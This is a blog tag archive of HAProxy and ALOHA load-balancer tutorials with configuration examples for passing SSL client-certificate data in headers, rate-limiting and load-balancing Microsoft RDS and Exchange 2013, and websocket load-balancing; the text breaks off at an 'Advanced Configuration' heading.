Tag Archives: infrastructure

SSL Client certificate information in HTTP headers and logs

HAProxy and SSL

HAProxy has many nice features when speaking about SSL, despite SSL has been introduced in it lately.

One of those features is the client side certificate management, which has already been discussed on the blog.
One thing was missing in the article, since HAProxy did not have the feature when I first write the article. It is the capability of inserting client certificate information in HTTP headers and reporting them as well in the log line.

Fortunately, the devs at HAProxy Technologies keep on improving HAProxy and it is now available (well, for some time now, but I did not have any time to write the article yet).

OpenSSL commands to generate SSL certificates

Well, just take the script from HAProxy Technologies github, follow the instruction and you’ll have an environment setup in a very few seconds.
Here is the script: https://github.com/exceliance/haproxy/tree/master/blog/ssl_client_certificate_management_at_application_level

Configuration

The configuration below shows a frontend and a backend with SSL offloading and with insertion of client certificate information into HTTP headers. As you can see, this is pretty straight forward.

frontend ft_www
 bind 127.0.0.1:8080 name http
 bind 127.0.0.1:8081 name https ssl crt ./server.pem ca-file ./ca.crt verify required
 log-format %ci:%cp [%t] %ft %b/%s %Tq/%Tw/%Tc/%Tr/%Tt %ST %B %CC %CS %tsc %ac/%fc/%bc/%sc/%rc %sq/%bq %hr %hs {%[ssl_c_verify],%{+Q}[ssl_c_s_dn],%{+Q}[ssl_c_i_dn]} %{+Q}r
 http-request set-header X-SSL                  %[ssl_fc]
 http-request set-header X-SSL-Client-Verify    %[ssl_c_verify]
 http-request set-header X-SSL-Client-DN        %{+Q}[ssl_c_s_dn]
 http-request set-header X-SSL-Client-CN        %{+Q}[ssl_c_s_dn(cn)]
 http-request set-header X-SSL-Issuer           %{+Q}[ssl_c_i_dn]
 http-request set-header X-SSL-Client-NotBefore %{+Q}[ssl_c_notbefore]
 http-request set-header X-SSL-Client-NotAfter  %{+Q}[ssl_c_notafter]
 default_backend bk_www

backend bk_www
 cookie SRVID insert nocache
 server server1 127.0.0.1:8088 maxconn 1

To observe the result, I just fake a server using netcat and observe the headers sent by HAProxy:

X-SSL: 1
X-SSL-Client-Verify: 0
X-SSL-Client-DN: "/C=FR/ST=Ile de France/L=Jouy en Josas/O=haproxy.com/CN=client1/emailAddress=ba@haproxy.com"
X-SSL-Client-CN: "client1"
X-SSL-Issuer: "/C=FR/ST=Ile de France/L=Jouy en Josas/O=haproxy.com/CN=haproxy.com/emailAddress=ba@haproxy.com"
X-SSL-Client-NotBefore: "130613144555Z"
X-SSL-Client-NotAfter: "140613144555Z"

And the associated log line which has been generated:

Jun 13 18:09:49 localhost haproxy[32385]: 127.0.0.1:38849 [13/Jun/2013:18:09:45.277] ft_www~ bk_www/server1 
1643/0/1/-1/4645 504 194 - - sHNN 0/0/0/0/0 0/0 
{0,"/C=FR/ST=Ile de France/L=Jouy en Josas/O=haproxy.com/CN=client1/emailAddress=ba@haproxy.com",
"/C=FR/ST=Ile de France/L=Jouy en Josas/O=haproxy.com/CN=haproxy.com/emailAddress=ba@haproxy.com"} "GET /" 

NOTE: I have inserted a few CRLF to make it easily readable.

Now, my HAProxy can deliver the following information to my web server:
  * ssl_fc: did the client used a secured connection (1) or not (0)
  * ssl_c_verify: the status code of the TLS/SSL client connection
  * ssl_c_s_dn: returns the full Distinguished Name of the certificate presented by the client
  * ssl_c_s_dn(cn): same as above, but extracts only the Common Name
  * ssl_c_i_dn: full distinguished name of the issuer of the certificate presented by the client
  * ssl_c_notbefore: start date presented by the client as a formatted string YYMMDDhhmmss
  * ssl_c_notafter: end date presented by the client as a formatted string YYMMDDhhmmss

Related Links

Links

Microsoft Remote Desktop Services (RDS) Load-Balancing and protection

RDS, RDP, TSE, remoteapp

Whatever you call it, it’s the remote desktop protocol from Microsoft, which has been renamed during the product life.
Basically, it allows users to get connected on remote server and run an application or a full desktop remotely.

It’s more and more fashion nowadays, because it’s easier for IT teams to patch and upgrade a single server hosting many remote desktops than maintaining many laptop individually.

VDI or Virtual Desktop Infrastructure


A Virtual Desktop Infrastructure is an architecture purposely built to export desktops to end users. It can use different type of product, such as Citrix or VMWare View.
Of course, you could build yours using Microsoft RDS as well as the ALOHA Load-Balancer to improve scalability and security of such platform.

Diagram

In a previous article, we already demonstrate how good the ALOHA Load-Balancer is to smartly load-balance Microsoft RDS.
Let’s start again from the same platform (I know, I’m a lazy engineer!):
rdp infrastructure

Windows Broker


When using the ALOHA Load-Balancer, you don’t need a windows broker anymore: the ALOHA is able to balance a new user to the less loaded server, as well as resume a broken session.
When an ALOHA outage occurs and a failover from the master to the slave happens, then all the sessions are resumed: the ALOHAs can share session affinity within a cluster, ensuring nobody will notice the issue.

Making an RDS platforms more secured


It’s easy to load-balance RDS protocol using the mstshash cookie, since microsoft described his protocol: it allows advanced persistence. Basically, each user owns a dedicated mstshash cookie value.

That said, being able to detect weird behavior or service abusers would be much better.

Actually, the ALOHA Load-Balancer allows you to monitor each source IP address, and, much better, each mstshash cookie value.
For any object, we can monitor the connection rate over a period of time, the number of current connection, the bytes in and out (over a period of time), etc…

Now, it’s up to you to protect your VDI infrastructure using the ALOHA Load-Balancer. In example:
  * counting the number of active connections per user (mstshash cookie)
  * counting the number of connection tries over the last 5 minutes per user

The above will allow you to detect the following problems / misbehavior on a VDI platform:
  * a user being abnormally connected too many times
  * a user trying to get connected to quickly, or maybe somebody is trying to discover someone else’s password 😉
  * etc…

Configuration

The configuration below explains how to create a highly-available VDI infrastructure with advanced persistence and improved security:

# for High-Availability purpose
peers aloha
  peer aloha1 10.0.0.16:1024
  peer aloha2 10.0.0.17:1024

# RDP / TSE configuration
frontend ft_rdp
  bind 10.0.0.18:3389 name rdp
  mode tcp
  timeout client 1h
  option tcplog
  option log global
  option tcpka
  # Protection 1
  # wait up to 5s for the mstshash cookie, and reject the client if none
  tcp-request inspect-delay 5s
  tcp-request content accept if RDP_COOKIE

  default_backend bk_rdp

backend bk_rdp
  mode tcp
  balance roundrobin
  # Options
  timeout server 1h
  timeout connect 4s
  option redispatch
  option tcpka
  option tcplog
  option log global
  # sticky persistence + monitoring based on mstshash Cookie
  #    established connection
  #    connection tries over the last minute
  stick-table type string len 32 size 10k expire 1d peers aloha store conn_cur,conn_rate(1m)
  stick on rdp_cookie(mstshash)

  # Protection 2
  # Each user is supposed to get a single active connection at a time, block the second one
  tcp-request content reject if { sc1_conn_cur ge 2 }

  # Protection 3
  # if a user tried to get connected at least 10 times over the last minute, 
  # it could be a brute force
  tcp-request content reject if { sc1_conn_rate ge 10 }

  # Server farm
  server tse1 10.0.0.23:3389 weight 10 check inter 2s rise 2 fall 3
  server tse2 10.0.0.24:3389 weight 10 check inter 2s rise 2 fall 3
  server tse3 10.0.0.25:3389 weight 10 check inter 2s rise 2 fall 3
  server tse4 10.0.0.26:3389 weight 10 check inter 2s rise 2 fall 3

Troubleshouting RDS connections issues with the ALOHA


The command below, when run from your ALOHA Load-Balancer CLI, will print out (and refresh every 1 second) the content of the stick-table with the following information:
  * table name, table size and number of current entries in the table
  * mstshash cookie value as sent by RDS client: field key
  * affected server id: field server_id
  * monitored counter and values, fields conn_rate and conn_cur

while true ; do clear ; echo show table bk_rdp | socat /tmp/haproxy.sock - ; sleep 1 ; done

stick-table output in a normal case


Below, an example of the output when everything goes well:

# table: bk_rdp, type: string, size:20480, used:2
0x912f84: key=Administrator use=1 exp=0 server_id=0 conn_rate(60000)=1 conn_cur=1
0x91ba14: key=XLC\Admin use=1 exp=0 server_id=1 conn_rate(60000)=1 conn_cur=1

stick-table output tracking a RDS abuser

Below, an example of the output when somebody tries many connections to discover someone’s password:

# table: bk_rdp, type: string, size:20480, used:2
0x912f84: key=Administrator use=1 exp=0 server_id=0 conn_rate(60000)=1 conn_cur=1
0x91ba14: key=XLC\Admin use=1 exp=0 server_id=1 conn_rate(60000)=1 conn_cur=1
0x91ca12: key=XLC\user1 use=1 exp=0 server_id=2 conn_rate(60000)=15 conn_cur=0

NOTE: in this case, the client has been blocked and the user user1 from the domain XLC can’t get connected for 1 minute (conn_rate monitoring period). I agree, this type of protection can lead to DOS your users…
We can easily configure the load-balancer to track source IP connection rate and is a single source IP tries to connect too often on our RDS farm, then we can block it before he can access it. (this type of attack would succeed only if the user is not only connected on the VDI platform)
Combining both source IP and mstshash cookie allows us to improve security on the VDI platform.

Securing a RDS platform combining both mstshash cookie and source IP address


The configuration below improve the protection by combining source IP address and RDS cookie.
The purpose is to block an abuser at a lower layer (IP) to avoid him making the Load-Balancer to blacklist regular user, even if this is temporary.

# for High-Availability purpose
peers aloha
  peer aloha1 10.0.0.16:1024
  peer aloha2 10.0.0.17:1024

# RDP / TSE configuration
frontend ft_rdp
  mode tcp
  bind 10.0.0.18:3389 name rdp
  timeout client 1h
  option tcpka
  log global
  option tcplog
  default_backend bk_rdp

backend bk_rdp
  mode tcp
  balance roundrobin

  # Options
  timeout server 1h
  timeout connect 4s
  option redispatch
  option tcpka
  log global
  option tcplog

  # sticky persistence + monitoring based on mstshash Cookie
  #    established connection
  #    connection tries over the last minute
  stick-table type string len 32 size 10k expire 1d peers aloha store conn_cur,conn_rate(1m)
  stick on rdp_cookie(mstshash)

  # Protection 1
  # wait up to 5s for the mstshash cookie, and reject the client if none
  tcp-request inspect-delay 5s
  tcp-request content accept if RDP_COOKIE
  tcp-request content track-sc1 rdp_cookie(mstshash) table bk_rdp
  tcp-request content track-sc2 src                  table sourceip

# IP layer protection
  #  Protection 2
  #   each single IP can have up to 2 connections on the VDI infrastructure
  tcp-request content reject if { sc2_conn_cur ge 2 }

  #  Protection 3
  #   each single IP can try up to 5 connections in a single minute
  tcp-request content reject if { sc2_conn_rate ge 10 }

# RDS / TSE application layer protection
  #  Protection 4
  #   Each user is supposed to get a single active connection at a time, block the second one
  tcp-request content reject if { sc1_conn_cur ge 2 }

  #  Protection 5
  #   if a user tried to get connected at least 10 times over the last minute, 
  #   it could be a brute force
  tcp-request content reject if { sc1_conn_rate ge 10 }

  # Server farm
  server tse1 10.0.0.23:3389 weight 10 check inter 2s rise 2 fall 3
  server tse2 10.0.0.24:3389 weight 10 check inter 2s rise 2 fall 3
  server tse3 10.0.0.25:3389 weight 10 check inter 2s rise 2 fall 3
  server tse4 10.0.0.26:3389 weight 10 check inter 2s rise 2 fall 3

backend sourceip
 stick-table type ip size 20k store conn_cur,conn_rate(1m)

Note that if you have remote sites using your VDI infrastructure, it is also possible to manage a source IP white list. And the same for the mstshash cookies: you can allow some users (like Administrator) to get connected multiple time on the VDI infrastructure.

Source IP and mstshash cookie combined protection


To observe the content of both tables (and still refreshed every 1s), just run the command below on your ALOHA CLI:

while true ; do clear ; echo show table bk_rdp | socat /tmp/haproxy.sock - ; echo "=====" ; echo show table sourceip | socat /tmp/haproxy.sock - ; sleep 1 ; done

And the result:

# table: bk_rdp, type: string, size:20480, used:2
0x23f1424: key=Administrator use=1 exp=0 server_id=0 conn_rate(60000)=0 conn_cur=1
0x2402904: key=XLC\Admin use=1 exp=0 server_id=1 conn_rate(60000)=1 conn_cur=1

=====
# table: sourceip, type: ip, size:20480, used:2
0x23f9f70: key=10.0.4.215 use=2 exp=0 conn_rate(60000)=2 conn_cur=2
0x23f1500: key=10.0.3.20 use=1 exp=0 conn_rate(60000)=0 conn_cur=1

Important Note about Microsoft RDS clients


As Mathew Levett stated on LoadBalancer.org’s blog (here is the article: http://blog.loadbalancer.org/microsoft-drops-support-for-mstshash-cookies/), latest version of Microsoft RDS clients don’t send the full user’s information into the mstshash cookie. Worst, sometime, the client don’t even send the cookie!!!!

In the example we saw above, there was 2 users connected on the infrastructure: the Administrator user was connected from a Linux client using xfreerdp tool, and we saw the cookie properly in the stick table. Second user, Administrator, from the Windows domain XLC, as his credential truncated in the stick table (Value: XLC\Admin), it was getting connected using Windows 2012 Server Enterprise RDS client.

As lb.org said, hopefully Microsoft will fix this issue. Or maybe there are some alternative RDS client for Windows…

To bypass this issue, we can take advantage of the ALOHA: we can do a persistence based on the source IP address when there is no mstshash cookies in the client connection information.
Just add the line below, right after the stick on rdp_cookie(mstshash):

  stick on src

With such configuration, the ALOHA Load-Balancer will stick on mstshash cookie, if present, and will failover on source IP address otherwise.

Conclusion


Virtualisation Desktop Infrastructure is a very fashion way of providing access to end users to a company’s applications.
If you don’t use the right product to build your RDS / TSE / RemoteApp infrastructure, you may be in trouble at some point.

The ALOHA Load-Balancer, thanks to its flexible configuration has many advantages

You can freely give a try to the ALOHA Load-Balancer, it is available from our website for download, allowing up to 10 connections with no time limitation: Download the ALOHA Load-Balancer

Links

Microsoft Exchange 2013 architectures

Introduction to Microsoft Exchange 2013

There are 2 types of server in Exchange 2013:
  * Mailbox server
  * Client Access server

Definitions from Microsoft Technet website:
  * The Client Access server provides authentication, limited redirection, and proxy services, and offers all the usual client access protocols: HTTP, POP and IMAP, and SMTP. The Client Access server, a thin and stateless server, doesn’t do any data rendering. There’s never anything queued or stored on the Client Access server.
  * The Mailbox server includes all the traditional server components found in Exchange 2010: the Client Access protocols, the Transport service, the Mailbox databases, and Unified Messaging (the Client Access server redirects SIP traffic generated from incoming calls to the Mailbox server). The Mailbox server handles all activity for the active mailboxes on that server.

High availability in Exchange 2013


Mailbox server high availability is achieved by the creation of a DAG: Database Availability Group. All the redundancy is achieved within the DAG and the Client Access server will retrieve the user session through the DAG automatically when a fail over occurs.

Client Access servers must be Load-Balanced to achieve high-availability. There are many ways to load-balance them:
  * DNS round-robin (Com’on, we’re in 2013, stop mentioning this option !!!!)
  * NLB (Microsoft don’t recommend it)
  * Load-Balancers (also known as Hardware Load-Balancer or HLB): this solution is recommended since it can bring smart load-balancing and advanced health checking.

Performance in Exchange 2013


The key performance in Exchange 2013 is obviously the Mailbox server. If this one slows down, all the users are affected. So be careful when designing your Exchange platform and try to create multiple DAGs with one single master per DAG. If one Mailbox server fails or is in maintenance, then you’ll be in degraded mode (which does not mean degraded performance) where one Mailbox server would be master on 2 DAGs. The disks IO may also be important here 😉

Concerning the Client Access server, it’s easy to disable temporarily one of them if it’s slowing down and route connections to the other Client Access server(s).

Exchange 2013 Architecture


Your architecture should meet your requirements:
  * if you don’t need high-availability and performance, then a single server with both Client Access and Mailbox role is sufficient
  * if you need high-availability and have a moderate number of users, a couple of servers, each one hosting both Client Access and Mailbox role is enough. A DAG to ensure high-availability of the Mailbox servers and a Load-Balancer to ensure high-availability of the Client Access servers.
  * if you need high-availability and performance for a huge amount of connections, then multiple Mailbox server, multiple DAGs, multiple Client Access servers and a couple of Load-Balancers.

Note that the path from the first architecture to the third one is doable with almost no effort, thanks to Exchange 2013.

Client Access server Load-Balancing in Exchange 2013


Using a Load-Balancer to balance user connections to the Client Access servers allows multiple type of architectures. The current article mainly focus on these architectures: we do provide load-balancers 😉
If you need help from Exchange architects, we have partners who can help you with the installation, setup and tuning of the whole architecture.

Load-Balancing Client Access servers in Exchange 2013

First of all, bear in mind that Client Access servers in Exchange 2013 are stateless. It is very important from a load-balancing point of view because it makes the configuration much more simple and scalable.
Basically, I can see 3 main types of architectures for Client Access servers load-balancing in Exchange 2013:
  1. Reverse-proxy mode (also known as source NAT)
  2. Layer 4 NAT mode (desitnation NAT)
  3. Layer 4 DSR mode (Direct Server Return, also known as Gateway)

Each type of architecture has pros and cons and may have impact on your global infrastructure. In the next chapter, I’ll provide details for each of them.

To illustrate the article, I’ll use a simple Exchange 2013 configuration:
  * 2 Exchange 2013 servers with hosting both Client Access and Mailbox role
  * 1 ALOHA Load-Balancer
  * 1 client (laptop)
  * all the Exchange services hosted on a single hostname (IE mail.domain.com) (could work as well with an hostname per service)

Reverse-proxy mode (also known as source NAT)


Diagram
The diagram below shows how things work with a Load-balancer in Reverse-proxy:
  1. the client establishes a connection onto the Load-Balancer
  2. the Load-Balancer chooses a Client Access server and establishes the connection on it
  3. client and CAS server discuss through the Load-Balancer
Basically, the Load-Balancer breaks the TCP connection between the client and the server: there are 2 TCP connections established.

exchange_2013_reverse_proxy

Advantages of Reverse-proxy mode
  * not intrusive: no infrastructure changes neither server changes
  * ability to perform SSL offloading and layer 7 persistence
  * client, Client Access servers and load-balancers can be located anywhere in the infrastructure (same subnet or different subnet)
  * can be used in a DMZ
  * A single interface is required on the Load-Balancer

Limitations of Reverse-proxy mode
  * the servers don’t see the client IPs (only the LB one)
  * maximum 65K connections on the Client Access farm (without tricking the configuration)

Configuration
To perform this type of configuration, you can use the LB Admin tab and do it through the GUI or just copy/paste the following lines into the LB Layer 7 tab:

######## Default values for all entries till next defaults section
defaults
  option  dontlognull             # Do not log connections with no requests
  option  redispatch              # Try another server in case of connection failure
  option  contstats               # Enable continuous traffic statistics updates
  retries 3                       # Try to connect up to 3 times in case of failure 
  backlog 10000                   # Size of SYN backlog queue
  mode tcp                        #alctl: protocol analyser
  log global                      #alctl: log activation
  option tcplog                   #alctl: log format
  timeout client  300s            #alctl: client inactivity timeout
  timeout server  300s            #alctl: server inactivity timeout
  timeout connect   5s            # 5 seconds max to connect or to stay in queue
  default-server inter 3s rise 2 fall 3   #alctl: default check parameters

frontend ft_exchange
  bind 10.0.0.9:443 name https    #alctl: listener https configuration.
  maxconn 10000                   #alctl: max connections (dep. on ALOHA capacity)
  default_backend bk_exchange     #alctl: default farm to use

backend bk_exchange
  balance roundrobin              #alctl: load balancing algorithm
  server exchange1 10.0.0.13:443 check
  server exchange2 10.0.0.14:443 check

(update IPs for your infrastructure and update the DNS name with the IP configured on the frontend bind line.)

Layer 4 NAT mode (desitnation NAT)


Diagram
The diagram below shows how things work with a Load-balancer in Layer 4 NAT mode:
  1. the client establishes a connection to the Client Access server through the Load-Balancer
  2. client and CAS server discuss through the Load-Balancer
Basically, the Load-Balancer acts as a router between the client and the server: a single TCP connection is established directly between the client and the Client Access server, and the LB just forward packets between both of them.
exchange_2013_layer4_nat

Advantages of Layer 4 NAT mode
  * no connection limit
  * Client Access servers can see the client IP address

Limitations of Layer 4 NAT mode
  * infrastructure intrusive: the server default gateway must be the load-balancer
  * clients and Client Access servers can’t be in the same subnet
  * no SSL acceleration, no advanced persistence
  * Must use 2 interfaces on the Load-Balancer (or VLAN interface)

Configuration
To perform this type of configuration, you can use the LB Admin tab and do it through the GUI or just copy/paste the following lines into the LB Layer 4 tab:

director exchange 10.0.1.9:443 TCP
  balance roundrobin                               #alctl: load balancing algorythm
  mode nat                                         #alctl: forwarding mode
  check interval 10 timeout 2                      #alctl: check parameters
  option tcpcheck                                  #alctl: adv check parameters
  server exchange1 10.0.0.13:443 weight 10 check   #alctl: server exchange1
  server exchange2 10.0.0.14:443 weight 10 check   #alctl: server exchange2

(update IPs for your infrastructure and update the DNS name with the IP configured on the frontend bind line.)

Layer 4 DSR mode (Direct Server Return, also known as Gateway)


Diagram
The diagram below shows how things work with a Load-balancer in Layer 4 DSR mode:
  1. the client establishes a connection to the Client Access server through the Load-Balancer
  2. the Client Access server acknowledges the connection directly to the client, bypassing the Load-Balancer on the way back. The Client Access server must have the Load-Balancer Virtual IP configured on a loopback interface.
  3. client and CAS server keep on discussing the same way: request through the load-balancer and responses directly from server to client.
Basically, the Load-Balancer acts as a router between the client and the server: a single TCP connection is established directly between the client and the Client Access server.
The Client and the server can be in the same subnet, like in the diagram, or can be in two different subnet. In the second case, the server would use its default gateway (no need to forward the traffic back through the load-balancer).
exchange_2013_layer4_dsr

Advantages of Layer 4 DSR mode
  * no connection limit
  * Client Access servers can see the client IP address
  * clients and Client Access servers can be in the same subnet
  * A single interface is required on the Load-Balancer

Limitations of Layer 4 DSR mode
  * infrastructure intrusive: the Load-Balancer Virtual IP must be configured on the Client Access server (Loopback).
  * no SSL acceleration, no advanced persistence

Configuration
To perform this type of configuration, you can use the LB Admin tab and do it though the web form or just copy/paste the following lines into the LB Layer 4 tab:

director exchange 10.0.0.9:443 TCP
  balance roundrobin                               #alctl: load balancing algorythm
  mode gateway                                     #alctl: forwarding mode
  check interval 10 timeout 2                      #alctl: check parameters
  option tcpcheck                                  #alctl: adv check parameters
  server exchange1 10.0.0.13:443 weight 10 check   #alctl: server exchange1
  server exchange2 10.0.0.14:443 weight 10 check   #alctl: server exchange2

Related links

Links

Microsoft Exchange 2013 load-balancing with HAProxy

Introduction to Microsoft Exchange server 2013

Note: I’ll introduce exchange from a Load-Balancing point of view. For a detailed information about exchange history and new features, please read the pages linked in the Related links at the bottom of this article.

Exchange is the name of the Microsoft software which provides a business-class mail / calendar / contact platform. It’s an old software, starting with version 4.0 back in 1996…
Each new version of Exchange Server brings in new features, both expanding Exchange perimeter and making it easier to deploy and administrate.

Exchange 2007


Introduction of Outlook Anywhere, AKA RPC over HTTP: allows remote users to get connected on Exchange 2007 platform using HTTPs protocol.

Exchange 2010


In example, Exchange 2010 introduced CAS arrays, making client side services high-available and scalable. DAG also brings mail database high-availability. All the client access services required persistence: a user must be sticked to a single CAS server.
Exchange 2010 introduced as well a “layer” between the MAPI RPC clients and the mailbox servers (through the CAS servers), making the failover of a database transparent.

Exchange 2013


Exchange 2013 improved again the changes brought by Exchange 2010: the CAS servers are now state-less and independent from each other (no arrays anymore): no persistence required anymore.
In exchange 2013, raw TCP MAPI RPC services have disappeared and have definitively been replaced by Outlook Anywhere (RPC over HTTP).
Last but not least, SSL offloading does not seem to be allowed for now.

Load-Balancing Microsoft Exchange 2013

First of all, I’m pleased to announce that HAProxy and the ALOHA Load-Balancer are both able to load-balance Exchange 2013 (as well as 2010).

Exchange 2013 Services


As explained in introduction, the table below summarizes the TCP ports and services involved in an Exchange 2013 platform:




TCP PortProtocolCAS Service name (abbreviation)
443HTTPS– Autodiscover (AS)
– Exchange ActiveSync (EAS)
– Exchange Control Panel (ECP)
– Offline Address Book (OAB)
– Outlook Anywhere (OA)
– Outlook Web App (OWA)
110 and 995POP3 / POP3sPOP3
143 and 993IMAP4 / IMAP4sIMAP4

Diagram

There are two main types of architecture doable:
1. All the services are hosted on a single host name
2. Each service owns its own host name

Exhange 2013 and the Single host name diagram


exchange_2013_single_hostname

Exhange 2013 and the Multiple host name diagram


exchange_2013_multiple_hostnames

Configuration

There are two types of configuration with the ALOHA:
Layer 4 mode: the LB act as a router, infrastrcuture intrusive, ability to manage millions of connections
layer 7 mode: the LB act as a reverse-proxy, non-intrusive implementation (source NAT), ability to manage thousands of connections, perform SSL offloading, DDOS protection, advanced persistence, etc…

The present article describe the layer 7 configuration, even if we’re going to use it at layer 4 (mode tcp).

Note that it’s up to you to update your DNS configuration to make the hostname point to your Load-Balancer service Virtual IP.

Template:
Use the configuration below as templates and just change the IP addresses:
bind line to your client facing service IPs
server line IPs to match your CAS servers (and add as many line as you need)
Once updated, just copy/paste the whole configuration, including the default section to the bottom of your ALOHA Layer 7 configuration.

Load-Balancing Exhange 2013 services hosted on a Single host name

######## Default values for all entries till next defaults section
defaults
  option  dontlognull             # Do not log connections with no requests
  option  redispatch              # Try another server in case of connection failure
  option  contstats               # Enable continuous traffic statistics updates
  retries 3                       # Try to connect up to 3 times in case of failure 
  timeout connect 5s              # 5 seconds max to connect or to stay in queue
  timeout http-keep-alive 1s      # 1 second max for the client to post next request
  timeout http-request 15s        # 15 seconds max for the client to send a request
  timeout queue 30s               # 30 seconds max queued on load balancer
  timeout tarpit 1m               # tarpit hold tim
  backlog 10000                   # Size of SYN backlog queue

  balance roundrobin                      #alctl: load balancing algorithm
  mode tcp                                #alctl: protocol analyser
  option tcplog                           #alctl: log format
  log global                              #alctl: log activation
  timeout client 300s                     #alctl: client inactivity timeout
  timeout server 300s                     #alctl: server inactivity timeout
  default-server inter 3s rise 2 fall 3   #alctl: default check parameters

frontend ft_exchange_tcp
  bind 10.0.0.9:443 name https          #alctl: listener https configuration.
  maxconn 10000                         #alctl: connection max (depends on capacity)
  default_backend bk_exchange_tcp       #alctl: default farm to use

backend bk_exchange_tcp
  server cas1 10.0.0.15:443 maxconn 10000 check    #alctl: server cas1 configuration.
  server cas2 10.0.0.16:443 maxconn 10000 check    #alctl: server cas2 configuration.

And the result (LB Admin tab):
– Virtual Service:
aloha_exchange2013_single_domain_virtual_services
– Server Farm:
aloha_exchange2013_single_domain_server_farm

Load-Balancing Exhange 2013 services hosted on Multiple host name

######## Default values for all entries till next defaults section
defaults
  option  dontlognull             # Do not log connections with no requests
  option  redispatch              # Try another server in case of connection failure
  option  contstats               # Enable continuous traffic statistics updates
  retries 3                       # Try to connect up to 3 times in case of failure 
  timeout connect 5s              # 5 seconds max to connect or to stay in queue
  timeout http-keep-alive 1s      # 1 second max for the client to post next request
  timeout http-request 15s        # 15 seconds max for the client to send a request
  timeout queue 30s               # 30 seconds max queued on load balancer
  timeout tarpit 1m               # tarpit hold tim
  backlog 10000                   # Size of SYN backlog queue

  balance roundrobin                      #alctl: load balancing algorithm
  mode tcp                                #alctl: protocol analyser
  option tcplog                           #alctl: log format
  log global                              #alctl: log activation
  timeout client 300s                     #alctl: client inactivity timeout
  timeout server 300s                     #alctl: server inactivity timeout
  default-server inter 3s rise 2 fall 3   #alctl: default check parameters

frontend ft_exchange_tcp
  bind 10.0.0.5:443  name as        #alctl: listener: autodiscover service
  bind 10.0.0.6:443  name eas       #alctl: listener: Exchange ActiveSync service
  bind 10.0.0.7:443  name ecp       #alctl: listener: Exchange Control Panel service
  bind 10.0.0.8:443  name ews       #alctl: listener: Exchange Web Service service
  bind 10.0.0.8:443  name oa        #alctl: listener: Outlook Anywhere service
  maxconn 10000                     #alctl: connection max (depends on capacity)
  default_backend bk_exchange_tcp   #alctl: default farm to use

backend bk_exchange_tcp
  server cas1 10.0.0.15:443 maxconn 10000 check   #alctl: server cas1 configuration.
  server cas2 10.0.0.16:443 maxconn 10000 check   #alctl: server cas2 configuration.

And the result (LB Admin tab):
– Virtual Service:
aloha_exchange2013_multiple_domain_virtual_services
– Server Farm:
aloha_exchange2013_multiple_domain_server_farm

Conclusion


This is a very basic and straight forward configuration. We could make it much more complete and improve timeouts per services, better health checking, DDOS protection, etc…
I may write later articles about Exchange 2013 Load-Balancing with our products.

Related links

Exchange 2013 installation steps
Exchange 2013 first configuration
Microsoft Exchange Server (Wikipedia)
Microsft Exchange official webpage

Links

Websockets load-balancing with HAProxy

Why Websocket ???


HTTP protocol is connection-less and only the client can request information from a server. In any case, a server can contact a client… HTTP is purely half-duplex. Furthermore, a server can answer only one time to a client request.
Some websites or web applications require the server to update client from time to time. There were a few ways to do so:

  • the client request the server at a regular interval to check if there is a new information available
  • the client send a request to the server and the server answers as soon as he has an information to provide to the client (also known as long time polling)

But those methods have many drawbacks due to HTTP limitation.
So a new protocol has been designed: websockets, which allows a 2 ways communication (full duplex) between a client and a server, over a single TCP connection. Furthermore, websockets re-use the HTTP connection it was initialized on, which means it uses the standard TCP port.

How does websocket work ???

Basically, a websocket start with a HTTP request like the one below:

GET / HTTP/1.1
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: avkFOZvLE0gZTtEyrZPolA==
Host: localhost:8080
Sec-WebSocket-Protocol: echo-protocol

The most important part is the “Connection: Upgrade” header which let the client know to the server it wants to change to an other protocol, whose name is provided by “Upgrade: websocket” header.

When a server with websocket capability receive the request above, it would answer a response like below:

HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: tD0l5WXr+s0lqKRayF9ABifcpzY=
Sec-WebSocket-Protocol: echo-protocol

The most important part is the status code 101 which acknoledge the protocol switch (from HTTP to websocket) as well as the “Connection: Upgrade” and “Upgrade: websocket” headers.

From now, the TCP connection used for the HTTP request/response challenge is used for the websocket: whenever a peer wants to interact with the other peer, it can use the it.

The socket finishes as soon as one peer decides it or the TCP connection is closed.

HAProxy and Websockets


As seen above, there are 2 protocols embedded in websockets:

  1. HTTP: for the websocket setup
  2. TCP: websocket data exchange

HAProxy must be able to support websockets on these two protocols without breaking the TCP connection at any time.
There are 2 things to take care of:

  1. being able to switch a connection from HTTP to TCP without breaking it
  2. smartly manage timeouts for both protocols at the same time

Fortunately, HAProxy embeds all you need to load-balance properly websockets and can meet the 2 requirements above.
It can even route regular HTTP traffic from websocket traffic to different backends and perform websocket aware health check (setup phase only).

The diagram below shows how things happens and HAProxy timeouts involved in each phase:
diagram websocket

During the setup phase, HAProxy can work in HTTP mode, processing layer 7 information. It detects automatically the Connection: Upgrade exchange and is ready to switch to tunnel mode if the upgrade negotiation succeeds. During this phase, there are 3 timeouts involved:

  1. timeout client: client inactivity
  2. timeout connect: allowed TCP connection establishment time
  3. timeout server: allowed time to the server to process the request

If everything goes well, the websocket is established, then HAProxy fails over to tunnel mode, no data is analyzed anymore (and anyway, websocket does not speak HTTP). There is a single timeout invloved:

  1. timeout tunnel: take precedence over client and server timeout

timeout connect is not used since the TCP connection is already established 🙂

Testing websocket with node.js

node.js is a platform which can host applications. It owns a websocket module we’ll use in the test below.

Here is the procedure to install node.js and the websocket module on Debian Squeeze.
Example code is issued from https://github.com/Worlize/WebSocket-Node, at the bottom of the page.

So basically, I’ll have 2 servers, each one hosting web pages on Apache and an echo application on websocket application hosted by nodejs. High-availability and routing is managed by HAProxy.

Configuration


Simple configuration


In this configuration, the websocket and the web server are on the same application.
HAProxy switches automatically from HTTP to tunnel mode when the client request a websocket.

defaults
  mode http
  log global
  option httplog
  option  http-server-close
  option  dontlognull
  option  redispatch
  option  contstats
  retries 3
  backlog 10000
  timeout client          25s
  timeout connect          5s
  timeout server          25s
# timeout tunnel available in ALOHA 5.5 or HAProxy 1.5-dev10 and higher
  timeout tunnel        3600s
  timeout http-keep-alive  1s
  timeout http-request    15s
  timeout queue           30s
  timeout tarpit          60s
  default-server inter 3s rise 2 fall 3
  option forwardfor

frontend ft_web
  bind 192.168.10.3:80 name http
  maxconn 10000
  default_backend bk_web

backend bk_web                      
  balance roundrobin
  server websrv1 192.168.10.11:8080 maxconn 10000 weight 10 cookie websrv1 check
  server websrv2 192.168.10.12:8080 maxconn 10000 weight 10 cookie websrv2 check

Advanced Configuration


